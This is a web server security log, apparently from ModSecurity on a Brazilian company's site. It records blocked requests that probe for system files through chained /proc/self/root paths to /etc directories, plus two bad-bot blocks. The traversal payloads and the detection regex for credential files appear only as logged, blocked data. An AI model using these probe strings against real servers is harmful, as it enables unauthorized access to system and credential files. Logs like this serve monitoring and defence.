[Wed Mar 18 05:59:41.963298 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:60300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppfdY0UrI5A3LftIxlyAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:48.864882 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:58986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpphMdf6f5d65gmYZShMgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:57.555941 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:49536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppjeoXxyEfFpUF8f87bgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:58.907504 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:49542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppjgkwaGbbGflqUZDf-wAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:00:01.650858 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:36990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppkSmAPhZkrhU8w4k9jwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:00:13.676513 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:48864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppnfu8EFLIOrSqIpvU3AAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:00:24.899544 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:55534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppqOyqAr6etmhZHNqKcwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:00:35.011482 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:59912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpps0zinOy1jxa1j4fhUQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:00:40.397799 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:40716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppuMdf6f5d65gmYZShRQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:00:41.913673 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:38346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppucdf6f5d65gmYZShRgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:00:45.099737 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:60944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppvdY0UrI5A3LftIxl3gAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:00:47.675361 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:54784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppvymAPhZkrhU8w4k9qAAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:00:52.892829 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:54794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppxEzinOy1jxa1j4fhWwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:00:54.365645 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:44542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppxuyqAr6etmhZHNqKigAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:01:24.620284 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:38362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpp5Pu8EFLIOrSqIpvVHgAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:02:00.086437 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:44548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqCOw_le52K8_3pV2wQgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:02:12.492015 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:46062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqEwkwaGbbGflqUZDgWgAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:02:17.421673 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:48876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqGSmAPhZkrhU8w4k91QAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:02:20.299465 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:36992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqHOoXxyEfFpUF8f87wAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:02:31.138897 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.228.61:55972] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpqJ-w_le52K8_3pV2wUwAAAhU"]
[Wed Mar 18 06:02:31.426433 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:33848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqJwkwaGbbGflqUZDgbQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:02:31.907015 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.244.43:38938] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpqJwkwaGbbGflqUZDgbwAAAMA"]
[Wed Mar 18 06:02:40.762425 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 74.7.241.31:40596] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/systemd
